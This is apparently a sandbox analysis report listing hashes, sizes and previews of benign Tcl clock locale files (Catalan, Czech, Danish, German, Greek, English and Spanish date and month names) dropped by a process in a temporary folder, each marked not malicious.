                                                                                                                                                                                                                                                    SHA-512:EF784D0D982BA0B0CB37F1DA15F8AF3BE5321F59E586DBED1EDD0B3A38213D3CEA1CDFC983A025418403400CCE6039B786EE35694A5DFCE1F22CB2D315F5FCF8
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/loadICU.tcl -- do not edit.namespace eval ::tcl::clock {. ::msgcat::mcset ca DAYS_OF_WEEK_ABBREV [list \. "dg."\. "dl."\. "dt."\. "dc."\. "dj."\. "dv."\. "ds."]. ::msgcat::mcset ca DAYS_OF_WEEK_FULL [list \. "diumenge"\. "dilluns"\. "dimarts"\. "dimecres"\. "dijous"\. "divendres"\. "dissabte"]. ::msgcat::mcset ca MONTHS_ABBREV [list \. "gen."\. "feb."\. "mar\u00e7"\. "abr."\. "maig"\. "juny"\. "jul."\. "ag."\. "set."\. "oct."\. "nov."\. "des."\. ""]. ::msgcat::mcset ca MONTHS_FULL [list \. "gener"\. "febrer"\. "mar\u00e7"\. "abril"\. "maig"\. "juny"\. "juliol"\. "agost"\. "setembre"\. "octubre"\. "novembre"\. "desembre"\. ""]. ::msgcat::mcset ca DATE_FORMAT "%d/%m/%Y". ::msg
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):1300
                                                                                                                                                                                                                                                    Entropy (8bit):4.400184537938628
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:24:4azu8f4sO4fETEtd3N5EPIK+kJQz3R3VJ2PYYITCF3eYGCvt2/v3eG:46/ETKN5EPIKfsxV+pBtMJ
                                                                                                                                                                                                                                                    MD5:4C5679B0880394397022A70932F02442
                                                                                                                                                                                                                                                    SHA1:CA5C47A76CD4506D8E11AECE1EA0B4A657176019
                                                                                                                                                                                                                                                    SHA-256:49CF452EEF0B8970BC56A7B8E040BA088215508228A77032CBA0035522412F86
                                                                                                                                                                                                                                                    SHA-512:39FA0D3235FFD3CE2BCCFFFA6A4A8EFE2668768757DAFDE901917731E20AD15FCAC4E48CF4ACF0ADFAA38CC72768FD8F1B826464B0F71A1C784E334AE72F857C
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/loadICU.tcl -- do not edit.namespace eval ::tcl::clock {. ::msgcat::mcset cs DAYS_OF_WEEK_ABBREV [list \. "Ne"\. "Po"\. "\u00dat"\. "St"\. "\u010ct"\. "P\u00e1"\. "So"]. ::msgcat::mcset cs DAYS_OF_WEEK_FULL [list \. "Ned\u011ble"\. "Pond\u011bl\u00ed"\. "\u00dater\u00fd"\. "St\u0159eda"\. "\u010ctvrtek"\. "P\u00e1tek"\. "Sobota"]. ::msgcat::mcset cs MONTHS_ABBREV [list \. "I"\. "II"\. "III"\. "IV"\. "V"\. "VI"\. "VII"\. "VIII"\. "IX"\. "X"\. "XI"\. "XII"\. ""]. ::msgcat::mcset cs MONTHS_FULL [list \. "leden"\. "\u00fanor"\. "b\u0159ezen"\. "duben"\. "kv\u011bten"\. "\u010derven"\. "\u010dervenec"\. "srpen"\. "z\u00e1\u0159\u00ed"\. "\u0159\u00edjen"\. "listopad"\. "prosinec"\. ""]
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):1156
                                                                                                                                                                                                                                                    Entropy (8bit):4.242018456508518
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/loadICU.tcl -- do not edit.namespace eval ::tcl::clock {. ::msgcat::mcset da DAYS_OF_WEEK_ABBREV [list \. "s\u00f8"\. "ma"\. "ti"\. "on"\. "to"\. "fr"\. "l\u00f8"]. ::msgcat::mcset da DAYS_OF_WEEK_FULL [list \. "s\u00f8ndag"\. "mandag"\. "tirsdag"\. "onsdag"\. "torsdag"\. "fredag"\. "l\u00f8rdag"]. ::msgcat::mcset da MONTHS_ABBREV [list \. "jan"\. "feb"\. "mar"\. "apr"\. "maj"\. "jun"\. "jul"\. "aug"\. "sep"\. "okt"\. "nov"\. "dec"\. ""]. ::msgcat::mcset da MONTHS_FULL [list \. "januar"\. "februar"\. "marts"\. "april"\. "maj"\. "juni"\. "juli"\. "august"\. "september"\. "oktober"\. "november"\. "december"\. ""]. ::msgcat::mcset da BCE "f.Kr.". ::msgcat::mcset da CE "e.Kr.".
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):1222
                                                                                                                                                                                                                                                    Entropy (8bit):4.277486792653572
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/loadICU.tcl -- do not edit.namespace eval ::tcl::clock {. ::msgcat::mcset de DAYS_OF_WEEK_ABBREV [list \. "So"\. "Mo"\. "Di"\. "Mi"\. "Do"\. "Fr"\. "Sa"]. ::msgcat::mcset de DAYS_OF_WEEK_FULL [list \. "Sonntag"\. "Montag"\. "Dienstag"\. "Mittwoch"\. "Donnerstag"\. "Freitag"\. "Samstag"]. ::msgcat::mcset de MONTHS_ABBREV [list \. "Jan"\. "Feb"\. "Mrz"\. "Apr"\. "Mai"\. "Jun"\. "Jul"\. "Aug"\. "Sep"\. "Okt"\. "Nov"\. "Dez"\. ""]. ::msgcat::mcset de MONTHS_FULL [list \. "Januar"\. "Februar"\. "M\u00e4rz"\. "April"\. "Mai"\. "Juni"\. "Juli"\. "August"\. "September"\. "Oktober"\. "November"\. "Dezember"\. ""]. ::msgcat::mcset de BCE "v. Chr.". ::msgcat::mcset de CE "n. Chr.".
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):812
                                                                                                                                                                                                                                                    Entropy (8bit):4.344116560816791
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/loadICU.tcl -- do not edit.namespace eval ::tcl::clock {. ::msgcat::mcset de_AT MONTHS_ABBREV [list \. "J\u00e4n"\. "Feb"\. "M\u00e4r"\. "Apr"\. "Mai"\. "Jun"\. "Jul"\. "Aug"\. "Sep"\. "Okt"\. "Nov"\. "Dez"\. ""]. ::msgcat::mcset de_AT MONTHS_FULL [list \. "J\u00e4nner"\. "Februar"\. "M\u00e4rz"\. "April"\. "Mai"\. "Juni"\. "Juli"\. "August"\. "September"\. "Oktober"\. "November"\. "Dezember"\. ""]. ::msgcat::mcset de_AT DATE_FORMAT "%Y-%m-%d". ::msgcat::mcset de_AT TIME_FORMAT "%T". ::msgcat::mcset de_AT TIME_FORMAT_12 "%T". ::msgcat::mcset de_AT DATE_TIME_FORMAT "%a %d %b %Y %T %z".}.
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):1223
                                                                                                                                                                                                                                                    Entropy (8bit):4.319193323810203
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/loadICU.tcl -- do not edit.namespace eval ::tcl::clock {. ::msgcat::mcset de_BE DAYS_OF_WEEK_ABBREV [list \. "Son"\. "Mon"\. "Die"\. "Mit"\. "Don"\. "Fre"\. "Sam"]. ::msgcat::mcset de_BE DAYS_OF_WEEK_FULL [list \. "Sonntag"\. "Montag"\. "Dienstag"\. "Mittwoch"\. "Donnerstag"\. "Freitag"\. "Samstag"]. ::msgcat::mcset de_BE MONTHS_ABBREV [list \. "Jan"\. "Feb"\. "M\u00e4r"\. "Apr"\. "Mai"\. "Jun"\. "Jul"\. "Aug"\. "Sep"\. "Okt"\. "Nov"\. "Dez"\. ""]. ::msgcat::mcset de_BE MONTHS_FULL [list \. "Januar"\. "Februar"\. "M\u00e4rz"\. "April"\. "Mai"\. "Juni"\. "Juli"\. "August"\. "September"\. "Oktober"\. "November"\. "Dezember"\. ""]. ::msgcat::mcset de_BE AM "vorm". ::msgcat::mcs
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):2252
                                                                                                                                                                                                                                                    Entropy (8bit):4.313031807335687
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/loadICU.tcl -- do not edit.namespace eval ::tcl::clock {. ::msgcat::mcset el DAYS_OF_WEEK_ABBREV [list \. "\u039a\u03c5\u03c1"\. "\u0394\u03b5\u03c5"\. "\u03a4\u03c1\u03b9"\. "\u03a4\u03b5\u03c4"\. "\u03a0\u03b5\u03bc"\. "\u03a0\u03b1\u03c1"\. "\u03a3\u03b1\u03b2"]. ::msgcat::mcset el DAYS_OF_WEEK_FULL [list \. "\u039a\u03c5\u03c1\u03b9\u03b1\u03ba\u03ae"\. "\u0394\u03b5\u03c5\u03c4\u03ad\u03c1\u03b1"\. "\u03a4\u03c1\u03af\u03c4\u03b7"\. "\u03a4\u03b5\u03c4\u03ac\u03c1\u03c4\u03b7"\. "\u03a0\u03ad\u03bc\u03c0\u03c4\u03b7"\. "\u03a0\u03b1\u03c1\u03b1\u03c3\u03ba\u03b5\u03c5\u03ae"\. "\u03a3\u03ac\u03b2\u03b2\u03b1\u03c4\u03bf"]. ::msgcat::mcset el MONTHS_ABBREV [list \. "\u0399\u03b1\u03bd"\. "\u03a6\u03b5\u03b2"\. "\u039c\u03b1\u03c1"\. "\u0391\u03c0\u03c1"\. "\u039c\u03b1\u03ca"\. "\u0399\u03bf\u03c5\u03bd"\. "\u
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):300
                                                                                                                                                                                                                                                    Entropy (8bit):4.849761581276844
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/loadICU.tcl -- do not edit.namespace eval ::tcl::clock {. ::msgcat::mcset en_AU DATE_FORMAT "%e/%m/%Y". ::msgcat::mcset en_AU TIME_FORMAT "%H:%M:%S". ::msgcat::mcset en_AU TIME_FORMAT_12 "%I:%M:%S %P %z". ::msgcat::mcset en_AU DATE_TIME_FORMAT "%e/%m/%Y %H:%M:%S %z".}.
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):305
                                                                                                                                                                                                                                                    Entropy (8bit):4.823881517188826
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/loadICU.tcl -- do not edit.namespace eval ::tcl::clock {. ::msgcat::mcset en_BE DATE_FORMAT "%d %b %Y". ::msgcat::mcset en_BE TIME_FORMAT "%k:%M:%S". ::msgcat::mcset en_BE TIME_FORMAT_12 "%k h %M min %S s %z". ::msgcat::mcset en_BE DATE_TIME_FORMAT "%d %b %Y %k:%M:%S %z".}.
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):251
                                                                                                                                                                                                                                                    Entropy (8bit):4.869619023232552
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/loadICU.tcl -- do not edit.namespace eval ::tcl::clock {. ::msgcat::mcset en_BW DATE_FORMAT "%d %B %Y". ::msgcat::mcset en_BW TIME_FORMAT_12 "%l:%M:%S %P". ::msgcat::mcset en_BW DATE_TIME_FORMAT "%d %B %Y %l:%M:%S %P %z".}.
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):288
                                                                                                                                                                                                                                                    Entropy (8bit):4.828989678102087
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/loadICU.tcl -- do not edit.namespace eval ::tcl::clock {. ::msgcat::mcset en_CA DATE_FORMAT "%d/%m/%y". ::msgcat::mcset en_CA TIME_FORMAT "%r". ::msgcat::mcset en_CA TIME_FORMAT_12 "%I:%M:%S %p". ::msgcat::mcset en_CA DATE_TIME_FORMAT "%a %d %b %Y %r %z".}.
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):279
                                                                                                                                                                                                                                                    Entropy (8bit):4.84511182583436
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/loadICU.tcl -- do not edit.namespace eval ::tcl::clock {. ::msgcat::mcset en_GB DATE_FORMAT "%d/%m/%y". ::msgcat::mcset en_GB TIME_FORMAT "%T". ::msgcat::mcset en_GB TIME_FORMAT_12 "%T". ::msgcat::mcset en_GB DATE_TIME_FORMAT "%a %d %b %Y %T %z".}.
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):321
                                                                                                                                                                                                                                                    Entropy (8bit):4.803235346516854
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/loadICU.tcl -- do not edit.namespace eval ::tcl::clock {. ::msgcat::mcset en_HK AM "AM". ::msgcat::mcset en_HK PM "PM". ::msgcat::mcset en_HK DATE_FORMAT "%B %e, %Y". ::msgcat::mcset en_HK TIME_FORMAT_12 "%l:%M:%S %P". ::msgcat::mcset en_HK DATE_TIME_FORMAT "%B %e, %Y %l:%M:%S %P %z".}.
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):279
                                                                                                                                                                                                                                                    Entropy (8bit):4.78446779523026
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/loadICU.tcl -- do not edit.namespace eval ::tcl::clock {. ::msgcat::mcset en_IE DATE_FORMAT "%d/%m/%y". ::msgcat::mcset en_IE TIME_FORMAT "%T". ::msgcat::mcset en_IE TIME_FORMAT_12 "%T". ::msgcat::mcset en_IE DATE_TIME_FORMAT "%a %d %b %Y %T %z".}.
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):310
                                                                                                                                                                                                                                                    Entropy (8bit):4.756550208645364
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/loadICU.tcl -- do not edit.namespace eval ::tcl::clock {. ::msgcat::mcset en_IN AM "AM". ::msgcat::mcset en_IN PM "PM". ::msgcat::mcset en_IN DATE_FORMAT "%d %B %Y". ::msgcat::mcset en_IN TIME_FORMAT "%H:%M:%S". ::msgcat::mcset en_IN DATE_TIME_FORMAT "%d %B %Y %H:%M:%S %z".}.
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):300
                                                                                                                                                                                                                                                    Entropy (8bit):4.89415873600679
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/loadICU.tcl -- do not edit.namespace eval ::tcl::clock {. ::msgcat::mcset en_NZ DATE_FORMAT "%e/%m/%Y". ::msgcat::mcset en_NZ TIME_FORMAT "%H:%M:%S". ::msgcat::mcset en_NZ TIME_FORMAT_12 "%I:%M:%S %P %z". ::msgcat::mcset en_NZ DATE_TIME_FORMAT "%e/%m/%Y %H:%M:%S %z".}.
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):321
                                                                                                                                                                                                                                                    Entropy (8bit):4.775448167269054
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/loadICU.tcl -- do not edit.namespace eval ::tcl::clock {. ::msgcat::mcset en_PH AM "AM". ::msgcat::mcset en_PH PM "PM". ::msgcat::mcset en_PH DATE_FORMAT "%B %e, %Y". ::msgcat::mcset en_PH TIME_FORMAT_12 "%l:%M:%S %P". ::msgcat::mcset en_PH DATE_TIME_FORMAT "%B %e, %Y %l:%M:%S %P %z".}.
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):251
                                                                                                                                                                                                                                                    Entropy (8bit):4.865159200607995
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/loadICU.tcl -- do not edit.namespace eval ::tcl::clock {. ::msgcat::mcset en_SG DATE_FORMAT "%d %b %Y". ::msgcat::mcset en_SG TIME_FORMAT_12 "%P %I:%M:%S". ::msgcat::mcset en_SG DATE_TIME_FORMAT "%d %b %Y %P %I:%M:%S %z".}.
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):245
                                                                                                                                                                                                                                                    Entropy (8bit):4.89152584889677
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/loadICU.tcl -- do not edit.namespace eval ::tcl::clock {. ::msgcat::mcset en_ZA DATE_FORMAT "%Y/%m/%d". ::msgcat::mcset en_ZA TIME_FORMAT_12 "%I:%M:%S". ::msgcat::mcset en_ZA DATE_TIME_FORMAT "%Y/%m/%d %I:%M:%S %z".}.
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):251
                                                                                                                                                                                                                                                    Entropy (8bit):4.888960668540414
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/loadICU.tcl -- do not edit.namespace eval ::tcl::clock {. ::msgcat::mcset en_ZW DATE_FORMAT "%d %B %Y". ::msgcat::mcset en_ZW TIME_FORMAT_12 "%l:%M:%S %P". ::msgcat::mcset en_ZW DATE_TIME_FORMAT "%d %B %Y %l:%M:%S %P %z".}.
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):1231
                                                                                                                                                                                                                                                    Entropy (8bit):4.282246801138565
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/loadICU.tcl -- do not edit.namespace eval ::tcl::clock {. ::msgcat::mcset eo DAYS_OF_WEEK_ABBREV [list \. "di"\. "lu"\. "ma"\. "me"\. "\u0135a"\. "ve"\. "sa"]. ::msgcat::mcset eo DAYS_OF_WEEK_FULL [list \. "diman\u0109o"\. "lundo"\. "mardo"\. "merkredo"\. "\u0135a\u016ddo"\. "vendredo"\. "sabato"]. ::msgcat::mcset eo MONTHS_ABBREV [list \. "jan"\. "feb"\. "mar"\. "apr"\. "maj"\. "jun"\. "jul"\. "a\u016dg"\. "sep"\. "okt"\. "nov"\. "dec"\. ""]. ::msgcat::mcset eo MONTHS_FULL [list \. "januaro"\. "februaro"\. "marto"\. "aprilo"\. "majo"\. "junio"\. "julio"\. "a\u016dgusto"\. "septembro"\. "oktobro"\. "novembro"\. "decembro"\. ""]. ::msgcat::mcset eo BCE "aK". ::msgcat::mcset e
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):1180
                                                                                                                                                                                                                                                    Entropy (8bit):4.216657382642579
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/loadICU.tcl -- do not edit.namespace eval ::tcl::clock {. ::msgcat::mcset es DAYS_OF_WEEK_ABBREV [list \. "dom"\. "lun"\. "mar"\. "mi\u00e9"\. "jue"\. "vie"\. "s\u00e1b"]. ::msgcat::mcset es DAYS_OF_WEEK_FULL [list \. "domingo"\. "lunes"\. "martes"\. "mi\u00e9rcoles"\. "jueves"\. "viernes"\. "s\u00e1bado"]. ::msgcat::mcset es MONTHS_ABBREV [list \. "ene"\. "feb"\. "mar"\. "abr"\. "may"\. "jun"\. "jul"\. "ago"\. "sep"\. "oct"\. "nov"\. "dic"\. ""]. ::msgcat::mcset es MONTHS_FULL [list \. "enero"\. "febrero"\. "marzo"\. "abril"\. "mayo"\. "junio"\. "julio"\. "agosto"\. "septiembre"\. "octubre"\. "noviembre"\. "diciembre"\. ""]. ::msgcat::mcset es BCE "a.C.". ::msgcat::mcset es
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):242
                                                                                                                                                                                                                                                    Entropy (8bit):4.830874390627383
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/loadICU.tcl -- do not edit.namespace eval ::tcl::clock {. ::msgcat::mcset es_AR DATE_FORMAT "%d/%m/%Y". ::msgcat::mcset es_AR TIME_FORMAT "%H:%M:%S". ::msgcat::mcset es_AR DATE_TIME_FORMAT "%d/%m/%Y %H:%M:%S %z".}.
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):251
                                                                                                                                                                                                                                                    Entropy (8bit):4.878640071219599
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/loadICU.tcl -- do not edit.namespace eval ::tcl::clock {. ::msgcat::mcset es_BO DATE_FORMAT "%d-%m-%Y". ::msgcat::mcset es_BO TIME_FORMAT_12 "%I:%M:%S %P". ::msgcat::mcset es_BO DATE_TIME_FORMAT "%d-%m-%Y %I:%M:%S %P %z".}.
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):251
                                                                                                                                                                                                                                                    Entropy (8bit):4.889615718638578
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:6:SlSyEtJLlpuoo6dmodvPWHFLok3v6rZodo+3vPUe6HK:4EnLzu8DgF93v6rC3vs3q
                                                                                                                                                                                                                                                    MD5:B7E7BE63F24FC1D07F28C5F97637BA1C
                                                                                                                                                                                                                                                    SHA1:8FE1D17696C910CF59467598233D55268BFE0D94
                                                                                                                                                                                                                                                    SHA-256:12AD1546EB391989105D80B41A87686D3B30626D0C42A73705F33B2D711950CC
                                                                                                                                                                                                                                                    SHA-512:FD8B83EF06B1E1111AFF186F5693B17526024CAD8CC99102818BE74FD885344D2F628A0541ABB485F38DB8DE7E29EA4EE4B28D8E5F6ECEF826BABE1013ABDFB8
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/loadICU.tcl -- do not edit.namespace eval ::tcl::clock {. ::msgcat::mcset es_CL DATE_FORMAT "%d-%m-%Y". ::msgcat::mcset es_CL TIME_FORMAT_12 "%I:%M:%S %P". ::msgcat::mcset es_CL DATE_TIME_FORMAT "%d-%m-%Y %I:%M:%S %P %z".}.
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):251
                                                                                                                                                                                                                                                    Entropy (8bit):4.862231219172699
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:6:SlSyEtJLlpuoo6dmo4FjbJFLo4F+3v6rZo4++3vjb0f6HK:4EnLzu8QJFL+3v6rv3vbq
                                                                                                                                                                                                                                                    MD5:FD946BE4D44995911E79135E5B7BD3BB
                                                                                                                                                                                                                                                    SHA1:3BA38CB03258CA834E37DBB4E3149D4CDA9B353B
                                                                                                                                                                                                                                                    SHA-256:1B4979874C3F025317DFCF0B06FC8CEE080A28FF3E8EFE1DE9E899F6D4F4D21E
                                                                                                                                                                                                                                                    SHA-512:FBD8087891BA0AE58D71A6D07482EED5E0EA5C658F0C82A9EC67DFC0D826059F1FC6FF404D6A6DC9619BD9249D4E4EC30D828B177E0939302196C51FA9B2FC4B
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/loadICU.tcl -- do not edit.namespace eval ::tcl::clock {. ::msgcat::mcset es_CO DATE_FORMAT "%e/%m/%Y". ::msgcat::mcset es_CO TIME_FORMAT_12 "%I:%M:%S %P". ::msgcat::mcset es_CO DATE_TIME_FORMAT "%e/%m/%Y %I:%M:%S %P %z".}.
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
